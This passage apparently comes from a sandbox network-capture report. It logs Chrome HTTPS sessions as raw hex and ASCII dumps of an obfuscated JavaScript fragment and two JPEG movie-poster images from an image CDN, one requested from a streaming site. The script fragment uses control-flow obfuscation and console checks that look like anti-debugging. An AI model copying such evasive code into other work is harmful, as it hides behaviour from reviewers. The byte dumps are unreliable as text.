                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 6d 35 3d 39 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 6d 35 3d 5a 35 5b 36 5d 5b 5a 35 5b 34 5d 5d 3f 33 3a 39 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 34 34 3a 72 65 74 75 72 6e 20 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 32 3a 5a 35 5b 34 36 5d 3d 5a 35 5b 38 37 5d 3b 6d 35 3d 34 31 3b 62 72 65 61 6b 3b 63 61 73 65 20 39 36 3a 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 35 32 5d 29 3b 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 36 39 5d 29 3b 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 34 38 5d 29 3b 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 38 32 5d 29 3b 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 34 36 5d 29 3b 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 33 35 5d 29 3b 5a 35 5b 31 34 5d 2e 41 39 37 37 28 5a 35 5b 36 35 5d 29 3b 6d 35 3d 31
                                                                                                                                                                                          Data Ascii: m5=90;break;case 4:m5=Z5[6][Z5[4]]?3:9;break;case 144:return 2;break;case 42:Z5[46]=Z5[87];m5=41;break;case 96:Z5[14].A977(Z5[52]);Z5[14].A977(Z5[69]);Z5[14].A977(Z5[48]);Z5[14].A977(Z5[82]);Z5[14].A977(Z5[46]);Z5[14].A977(Z5[35]);Z5[14].A977(Z5[65]);m5=1
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 65 20 32 33 3a 72 65 74 75 72 6e 20 41 35 5b 37 5d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 30 3a 41 35 5b 32 5d 5b 41 35 5b 36 5d 5b 5a 35 5b 39 35 5d 5d 5d 2e 68 2b 3d 74 72 75 65 3b 78 35 3d 31 39 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 39 3a 41 35 5b 33 5d 2b 2b 3b 78 35 3d 37 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 34 3a 78 35 3d 74 79 70 65 6f 66 20 41 35 5b 32 5d 5b 41 35 5b 36 5d 5b 5a 35 5b 39 35 5d 5d 5d 3d 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 3f 31 33 3a 31 31 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 78 35 3d 41 35 5b 30 5d 5b 30 5d 2e 6c 65 6e 67 74 68 3d 3d 3d 30 3f 35 3a 34 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 36 3a 78 35 3d 41 35 5b 33 5d 3c 41 35 5b 35 5d 2e 6c 65 6e 67 74 68 3f 31 35 3a 32 33 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 36 3a
                                                                                                                                                                                          Data Ascii: e 23:return A5[7];break;case 20:A5[2][A5[6][Z5[95]]].h+=true;x5=19;break;case 19:A5[3]++;x5=7;break;case 14:x5=typeof A5[2][A5[6][Z5[95]]]==='undefined'?13:11;break;case 1:x5=A5[0][0].length===0?5:4;break;case 16:x5=A5[3]<A5[5].length?15:23;break;case 26:
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 74 69 6f 6e 28 29 7b 76 61 72 20 56 31 3d 74 79 70 65 6f 66 20 55 39 37 37 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 3b 72 65 74 75 72 6e 20 56 31 3b 7d 3b 5a 35 5b 32 39 5d 3d 5a 35 5b 35 5d 3b 5a 35 5b 38 37 5d 3d 7b 7d 3b 5a 35 5b 38 37 5d 2e 43 3d 5b 27 76 37 27 2c 27 79 37 27 5d 3b 5a 35 5b 38 37 5d 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 52 31 3d 66 75 6e 63 74 69 6f 6e 28 6b 31 29 7b 72 65 74 75 72 6e 20 6b 31 26 26 6b 31 5b 27 62 27 5d 3b 7d 3b 76 61 72 20 75 31 3d 2f 5c 78 32 65 2f 2e 6f 39 37 37 28 52 31 2b 5b 5d 29 3b 72 65 74 75 72 6e 20 75 31 3b 7d 3b 6d 35 3d 34 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 37 32 3a 5a 35 5b 33 34 5d 3d 7b 7d 3b 5a 35 5b 33 34 5d 2e 43 3d 5b 27 76 37 27 5d 3b 5a 35 5b 33 34 5d 2e 53 3d 66 75 6e 63 74 69
                                                                                                                                                                                          Data Ascii: tion(){var V1=typeof U977==='function';return V1;};Z5[29]=Z5[5];Z5[87]={};Z5[87].C=['v7','y7'];Z5[87].S=function(){var R1=function(k1){return k1&&k1['b'];};var u1=/\x2e/.o977(R1+[]);return u1;};m5=42;break;case 72:Z5[34]={};Z5[34].C=['v7'];Z5[34].S=functi
                                                                                                                                                                                          2024-12-15 11:38:17 UTC1024INData Raw: 5b 27 76 37 27 2c 27 79 37 27 5d 3b 5a 35 5b 31 33 5d 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 58 31 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 31 30 32 34 2a 31 30 32 34 3b 7d 3b 76 61 72 20 70 31 3d 2f 5b 37 2d 38 36 35 2d 35 5d 2f 2e 6f 39 37 37 28 58 31 2b 5b 5d 29 3b 72 65 74 75 72 6e 20 70 31 3b 7d 3b 6d 35 3d 34 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 74 72 75 65 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 39 3a 5a 35 5b 31 36 5d 2e 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 53 31 3d 66 61 6c 73 65 3b 76 61 72 20 66 31 3d 5b 5d 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 67 31 20 69 6e 20 63 6f 6e 73 6f 6c 65 29 66 31 2e 41 39 37 37 28 67 31 29 3b 53 31 3d 66 31 2e 6c 65 6e 67 74 68 3d 3d 3d 30 3b
                                                                                                                                                                                          Data Ascii: ['v7','y7'];Z5[13].S=function(){var X1=function(){return 1024*1024;};var p1=/[7-865-5]/.o977(X1+[]);return p1;};m5=45;break;case 3:return true;break;case 59:Z5[16].S=function(){var S1=false;var f1=[];try{for(var g1 in console)f1.A977(g1);S1=f1.length===0;


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          140192.168.2.1649884151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC445OUTGET /images/M/MV5BYjliZjQ1NGMtNjU1MS00M2RmLThkN2UtM2NlNTJjM2FjYTk1XkEyXkFqcGdeQXVyMjgyNjk3MzE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 20870
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: e068ad17-40f8-4e37-a931-2b1d22e71f18
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 12 Feb 2017 10:07:04 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 01 Oct 2044 18:28:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1493742
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000081-IAD, cache-nyc-kteb1890066-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 92 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 00 08 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 0b a9 ec 8a f7 3a 1d f7 94 1c ef 54 1c
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4:T
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 88 86 5a 5f 36 cb a3 cf a4 6c 32 cb a0 f7 15 2e 23 9a e6 ec 74 7b 2d a5 29 88 f9 e8 6b a3 24 45 98 d5 71 8b 0f 2e 9a 4b 44 63 72 92 46 38 a9 71 27 16 46 d0 23 d2 91 14 da 16 da a9 3e 8e f1 2d 36 f2 22 a3 41 21 06 69 bf 21 59 d5 fe ed 4b ba fd 1f 8b cc 83 60 c5 a4 e1 51 92 b8 fa 6b 54 0b 3d 53 a4 62 2a fb ac c7 4a 99 29 3e e2 10 e7 22 f1 13 bb 0d 4a 89 4c 03 3b 3d 75 cb 9e 0b ba f0 6a c2 5e a8 63 57 ef 42 11 d1 91 b8 75 73 f9 6a fa c8 49 20 3b 84 9b 73 1a 3c d6 53 83 00 94 4c 34 1e e2 95 17 7d b9 d3 6e 9f 47 e2 a3 12 db b1 74 7a 1c c0 1c bd 15 c0 87 c4 6c 09 7e 63 d6 05 87 62 8b 16 2b a6 3a dd 6d 16 46 da 04 c9 e6 d0 12 5c b7 d5 46 bf d3 0f 72 6f a5 62 9a ff 00 cf d6 58 3b 52 9d bd 1d f0 34 88 e5 86 83 d4 b5 53 e0 af 5c 5a 4e ec 88 f8 66 d4 67 59 ca e3 3e
                                                                                                                                                                                          Data Ascii: Z_6l2.#t{-)k$Eq.KDcrF8q'F#>-6"A!i!YK`QkT=Sb*J)>"JL;=uj^cWBusjI ;s<SL4}nGtzl~cb+:mF\FrobX;R4S\ZNfgY>
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 66 66 76 cc cc cc ce f9 99 99 db 33 33 94 e5 33 39 4e 53 9c e7 39 4e 53 4c 73 cb 77 f3 b6 26 20 68 26 26 a3 d4 95 3e 95 d2 ea 7a 8c 44 69 99 99 9f 8e 7e 39 8d 70 11 f5 e8 23 fa a7 fa 3e a2 c6 0d 7d 82 7f c8 b4 ff 00 91 31 75 ac 60 b7 33 9c ea 62 75 a7 a7 bf 2e 7b bf 9f 86 23 15 ac 16 6d 5e bd af fa 57 19 c2 aa 68 8e 90 75 5c fa 84 5f 50 1f 9a f5 28 f3 3f 0c ed 9d b9 cb 35 01 65 9e a2 4f 87 b9 9f ce 27 19 89 81 30 b1 5d 44 5b c4 ea ce a4 26 17 02 7a 23 64 dd bb f9 d8 6d 75 eb 42 f2 7d 46 a9 b5 27 2d 55 6d 79 e2 9a 4d 1a e9 c7 6b eb ea 29 12 da 8d 64 8d b3 12 f7 4f 09 ea 0c 3c d7 af 57 81 b3 06 e6 33 19 7b 72 9c 20 4c 46 6c 6d 98 15 8f 78 10 98 2a 81 66 27 18 53 1b 7a 17 9b b7 7f 27 61 1f d4 ea 4f 1a 87 7b 1b 95 95 27 55 d5 0d 54 ad 2b c5 76 d4 e9 3a 9d c3
                                                                                                                                                                                          Data Ascii: ffv3339NS9NSLsw& h&&>zDi~9p#>}1u`3bu.{#m^Whu\_P(?5eO'0]D[&z#dmuB}F'-UmyMk)dO<W3{r LFlmx*f'Sz'aO{'UT+v:
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 05 13 1f 0b db 8a 18 cb 18 66 55 a7 36 30 03 55 84 02 b5 29 38 c0 48 c8 94 55 96 ee b5 64 e4 ef 8f 86 9b c1 dd 8f 78 20 12 d1 91 c6 71 81 60 5c 39 13 8c c6 c0 ed 9f 88 9a 8e f8 8f 5c e9 c4 4f 6e 91 e7 19 c6 0d 39 3d e5 54 71 13 13 13 1f 03 b6 9b c1 dd bc cf 70 e2 08 3b bc b3 57 ff 00 cf bb 65 c4 37 07 50 e3 51 71 af 18 d3 dc 6c ce 65 da 96 46 c0 eb 1e 97 39 ef 5e 7b f7 9a 6d 43 5a 48 36 db c3 8c 5d 73 e4 72 8e 33 1a b9 5d 23 3c 8d bf 51 8c 93 a5 99 56 94 7e 58 7e 01 ed f1 c6 d8 98 9a 7f 07 7b 07 78 60 31 db 02 c9 a7 af 99 ef 65 01 c7 6a 0f d5 89 71 ca d5 34 7e 1b 6d 4f de 65 69 ce a0 25 ba 74 ac 66 55 52 5a 71 29 a0 55 e3 5a d9 60 25 fe 73 28 7e 75 a1 db 8e 63 7f a9 c6 70 98 99 99 87 6c fc e8 f0 76 12 cf 30 c1 2e f0 66 8f ed 30 45 3f 58 97 7d b5 cd 17 86
                                                                                                                                                                                          Data Ascii: fU60U)8HUdx q`\9\On9=Tqp;We7PQqleF9^{mCZH6]sr3]#<QV~X~{x`1ejq4~mOei%tfURZq)UZ`%s(~ucplv0.f0E?X}
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 1a 60 31 3d aa f6 87 4e 08 02 7b 3a 7c 4e 92 fd 42 74 53 23 0f a7 47 ce 46 8e b1 e2 ee 8e 94 2c 55 08 02 8f fa 0c 09 da 76 d9 eb 0f e7 33 3f f4 ff 00 ff c4 00 2b 11 00 02 02 01 03 03 02 05 05 01 00 00 00 00 00 00 01 02 00 11 03 04 12 13 10 21 31 22 41 05 14 32 34 42 20 23 30 33 51 40 ff da 00 08 01 02 01 01 08 00 fd 35 2b a8 fd 75 2b a6 a4 90 82 86 47 a9 c8 f3 91 e7 2e 4b 83 33 ce 67 9c cf 39 9e 73 bc 19 de 0c ef 39 72 43 99 c4 19 de 73 bc 3a 8c 90 ea b2 cc 2e 5b 18 2d aa 34 82 2c 26 8d 4e 49 7d e0 9b 44 d9 36 4e 39 b2 6c e9 5d 2e 16 84 cc 1f d4 26 ac d2 08 1a 6e bf 3b 4c 62 6a 1c ac 3c 2e a9 a0 d6 99 f3 93 e7 16 0d 48 33 9d 67 2d fd 23 0e 53 3e 57 24 38 b2 0f 2d 98 43 a9 02 69 5a f0 29 9a d3 e8 58 1b bc 09 73 65 76 8e d6 8c 02 fc 2f 03 ad ab 7c 10 f9 47
                                                                                                                                                                                          Data Ascii: `1=N{:|NBtS#GF,Uv3?+!1"A24B #03Q@5+u+G.K3g9s9rCs:.[-4,&NI}D6N9l].&n;Lbj<.H3g-#S>W$8-CiZ)Xsev/|G
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 12 d3 11 b6 63 b1 62 56 bb 3a 6e 5b f9 c6 e9 16 33 9e e0 ae ac 74 e4 df df b1 37 a8 96 ab af 24 bc 7c 26 58 d5 ed 29 f2 62 37 12 18 57 70 74 e4 1b aa 38 66 dd 5d 42 bb 3e 2c 3a 65 45 b9 05 c2 a5 7c 3f 49 c7 b0 7b df d0 8d 7f 3a ea 76 35 fc ea a5 9d b4 0d d4 d1 a4 2d d6 e8 46 e2 c3 3e 80 85 c6 4f 51 b3 25 cb 34 e9 d9 cd 5d c2 b9 79 f8 6a 65 fe e1 e5 3e 4f a5 39 26 b3 a3 91 8f bf bc 47 d8 31 3a 9d c1 38 46 5e 75 c1 97 7e 3b 7c 71 7a 82 65 26 8b 0a 91 a5 39 28 cc 54 75 04 29 72 5b 2f 21 b4 c3 98 2b c4 84 27 c4 c6 1b c8 af 57 37 81 32 ff 00 70 f2 8f 26 6a 11 2a c8 e2 74 d9 3d 3f 63 b9 5e b5 28 bc b2 6a 64 8d e8 cc 3b bb 79 08 66 50 f1 10 95 b7 61 82 5f 59 ad ef c3 b2 86 2a c2 35 bb 1a 23 1d 18 02 b8 18 2c 2e ee 3b 39 2d b9 97 fb 87 94 79 3e a4 ca b2 8a fb 1b
                                                                                                                                                                                          Data Ascii: cbV:n[3t7$|&X)b7Wpt8f]B>,:eE|?I{:v5-F>OQ%4]yje>O9&G1:8F^u~;|qze&9(Tu)r[/!+'W72p&j*t=?c^(jd;yfPa_Y*5#,.;9-y>
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 85 08 dc 82 08 20 82 08 20 82 08 20 82 08 75 a2 03 7a 04 d9 01 c8 0e 21 7c 50 fb b6 da e1 e4 b9 38 cd b1 26 15 e2 ba c0 6c e7 1c c1 04 10 41 04 10 41 0d 08 99 81 51 5f 57 51 5f 15 ef 5a 6e 5e ae d3 e3 e6 8f 1f d2 7e 05 1d 9e bf 44 71 f4 97 15 7c 3e 5e ce 68 4e c6 ae 0e 09 23 eb 72 ae ab 17 c0 4f 8a a3 43 7e 05 fe 89 fa d7 9f 2c eb 54 7b e6 fa 07 af d2 89 e8 7b de fa c6 63 04 f5 87 bd 73 cc 55 3b f9 cb df cd 42 4b 72 d0 99 9b 82 e4 be fc 0b fa 9d d9 ec 9a 82 d4 31 08 05 a7 f0 c2 c8 7d d4 26 d6 52 64 dd 72 4c 3d ed 79 19 d2 41 0f 92 05 84 50 ed 6a ef 74 f5 83 76 b5 66 36 a7 7b 5b 4f f9 0f 50 bc 33 f3 9a 06 90 f7 aa cd fb ff 00 52 73 d6 f2 a9 f7 44 f3 86 e6 91 9d 10 f0 4a d6 0e f8 d6 5f 35 32 61 88 57 28 5a fc 93 ce 09 07 a1 35 c7 25 56 8a 6f 53 ad ff 00 b3
                                                                                                                                                                                          Data Ascii: uz!|P8&lAAQ_WQ_Zn^~Dq|>^hN#rOC~,T{{csU;BKr1}&RdrL=yAPjtvf6{[OP3RsDJ_52aW(Z5%VoS
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 61 d7 42 22 2e a2 77 a7 7d 9d f8 75 61 d6 9d e9 dc 9d e9 dc 9d e9 7d 48 fa 08 a8 96 96 d4 85 2f 2f 2d 2f a5 7d 26 47 6f a2 1a 0b 4d f0 26 f1 d7 19 71 d0 97 2e 2c 18 42 6d a2 7d 03 55 e8 cb 8c 15 ec d7 38 97 98 a5 42 5c c3 46 e2 94 c3 41 d4 90 c3 24 12 45 cb a9 70 74 3a 0c b9 72 e2 fd 40 68 db ab 49 70 c7 ab cc 58 32 e5 cb d4 bf a0 32 e5 e8 b8 b2 e6 30 a6 82 11 0a 46 2e 3b f6 6b b9 e6 61 3c e9 1c 18 de 0c a9 bb ea 82 0d 45 cb 85 75 97 e8 6e af 0d 5a c6 3e 33 50 5a 05 46 d2 e4 7e 62 b9 db 1b 56 dd 78 86 b3 94 8e b5 48 b9 50 b8 90 81 97 2e 5d 47 39 bd ce 5e 71 4b 6e f9 4d f2 76 20 11 b8 aa 8f db a4 93 8e f2 c7 8f e5 ae f7 99 75 2e 04 27 9d 00 65 bd be df 97 a1 da 0d 58 1b 06 f2 ef 58 36 f1 71 df 5e 3a 4e 3a a6 c8 c2 fb 42 5c 18 c7 7d 17 53 74 dc 1e 2e 19 47
                                                                                                                                                                                          Data Ascii: aB".w}ua}H//-/}&GoM&q.,Bm}U8B\FA$Ept:r@hIpX220F.;ka<EunZ>3PZF~bVxHP.]G9^qKnMv u.'eXX6q^:N:B\}St.G
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 74 29 71 d0 c7 42 6c f3 d0 4e 7e 74 18 96 42 88 fe fe cc c7 5d 74 16 74 df d6 55 5a b6 c3 a8 12 e5 40 95 5a 54 e7 42 4a 81 36 f9 e8 23 cb e7 45 04 b5 60 af 3f fc d2 86 87 44 fa 46 5c 75 2a 9e 61 a2 e5 5e 94 eb 14 21 db bc 2a 97 83 6f 78 6e 83 e6 7e c7 88 76 1b d5 69 a2 43 1d 2a 7c df cb 42 1c bc c3 29 22 cf e8 19 9b d7 af de 58 d4 53 19 74 aa 24 20 e8 46 5e d1 ef d8 36 9d a2 a8 5b 4d a5 65 5b ab d6 75 3f 9c c1 f0 31 eb c0 96 0d 1c c4 95 a1 41 e4 68 43 f2 8a 5d 04 78 9e cf e3 f1 05 9d c9 fb 8c 5e 2c 3b 25 a3 17 96 8c dd 96 84 14 8d b4 59 d8 07 f7 bc 3b c1 6c 5e f1 15 8c b6 3d 49 5e 63 0a c1 79 8a f9 3f 88 36 8d 83 42 c6 6f 2a 09 b7 c8 d0 99 1e 58 43 b6 e3 9b 87 d8 1e df fb 05 76 11 fd fc 46 08 df a0 bc ce 17 97 78 87 0a 3a 75 18 68 0c 2a 0c d1 c9 e0 a4 64
                                                                                                                                                                                          Data Ascii: t)qBlN~tB]ttUZ@ZTBJ6#E`?DF\u*a^!*oxn~viC*|B)"XSt$ F^6[Me[u?1AhC]x^,;%Y;l^=I^cy?6Bo*XCvFx:uh*d
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 5e ac 3d 6d 5e d9 c9 b5 8a 30 40 6d 96 19 36 5b 93 36 d9 57 b5 5c 21 c8 58 a1 4b 95 ea 64 3a d4 dc 30 6c 37 86 5c a7 26 ee 9b c5 1c c5 cd b5 72 d6 0c f0 13 b8 56 23 50 38 a0 bd e8 6e ec 37 a6 eb 38 da 37 b2 bd 8d 80 5d f1 48 87 aa 98 fd 53 7a b4 32 0e 1e 71 8d 83 87 09 05 e0 23 45 1c 8d db ed c8 27 79 5a cb dd 65 56 20 2e 63 22 e2 d2 08 10 95 76 5b 19 b4 29 ce 79 83 a7 83 8d 4a b9 53 27 24 38 77 8c 79 39 42 a6 09 45 e3 28 f0 3b 11 7e 9c 3d b6 a1 56 2b 36 cd 28 a7 0c 38 da 1c bd fe ad bf 8c 7d 16 ba 7f 24 3a ed a9 8b ea bf 27 da 70 d2 ea f3 b4 db 7e 1e 70 c3 f2 c5 bf 06 c3 76 f7 6f 05 c8 4c 8d b8 ba c2 2d d3 d4 21 d1 8b 28 d9 7c 6e fb de 2c 8f 44 e9 b5 ad 9e 12 22 b7 e9 93 6b dd f9 c9 f4 96 72 ca 29 be a4 da 35 64 df 31 5c 59 cf bb 97 e2 8f 44 18 16 f8 52
                                                                                                                                                                                          Data Ascii: ^=m^0@m6[6W\!XKd:0l7\&rV#P8n787]HSz2q#E'yZeV .c"v[)yJS'$8wy9BE(;~=V+6(8}$:'p~pvoL-!(|n,D"kr)5d1\YDR


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          141192.168.2.1649883151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC676OUTGET /images/M/MV5BMjEyMzYyZWEtYzM3Ny00YTgxLThmMTQtY2YzM2JkYWQ1YzNjXkEyXkFqcGdeQXVyMTA0MTM5NjI2._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 37560
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: baef0b7a-b78f-40b6-bfd8-942e94ca9d74
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 09 May 2023 23:15:37 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 26 Nov 2044 08:03:39 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1222479
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200084-IAD, cache-ewr-kewr1740069-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 02 03 08 00 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 06 00 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 4b 10 63 46 37 47 27 e4 08 7e 93 d1
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6KcF7G'~
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: be 4b 4c 55 67 47 d0 86 5e e6 a0 82 fa 8e 3a dc fc d9 d3 2d f2 f8 57 b6 10 7f 2d 5c 41 60 17 83 d0 0f 92 42 48 ae 81 40 74 a7 2e b4 32 f2 57 63 3c 85 c0 84 26 3d 87 d5 cc 6b 2f b8 cd cf 89 b2 7b 91 33 df 16 09 4d 62 e7 b7 41 29 54 3e 82 87 4b d7 cd 34 bc 73 af 79 58 5f 9f 3f a3 0e 29 1e 23 42 22 24 b3 03 aa ce 48 a5 25 40 5d 3d 6c cf 95 76 d1 cc 90 36 a4 0e 8b 37 6e a1 c3 de ca 27 85 74 d3 8f b7 e5 ef 4a c9 d8 d9 bb ec a8 95 8e 4a ec de 66 8b 54 72 e1 15 d4 cb 9c 51 4e ee 0b 36 1c a1 c6 96 a3 21 13 40 34 12 29 a5 05 f1 1d 10 d8 b4 44 8b 2f ec 56 62 a9 06 d6 76 d5 55 4b 52 9d e7 cc bd 21 d2 73 13 84 49 1b 96 c1 92 0a 85 53 75 9c 3a f6 f4 58 9f f6 30 f9 a3 46 7b 75 76 dc d6 10 77 c5 65 4e 76 b6 69 a6 fe 73 aa 26 e8 b2 5b 3b 4c f1 14 b7 1b 52 3d 41 71 ac 04
                                                                                                                                                                                          Data Ascii: KLUgG^:-W-\A`BH@t.2Wc<&=k/{3MbA)T>K4syX_?)#B"$H%@]=lv67n'tJJfTrQN6!@4)D/VbvUKR!sISu:X0F{uvweNvis&[;LR=Aq
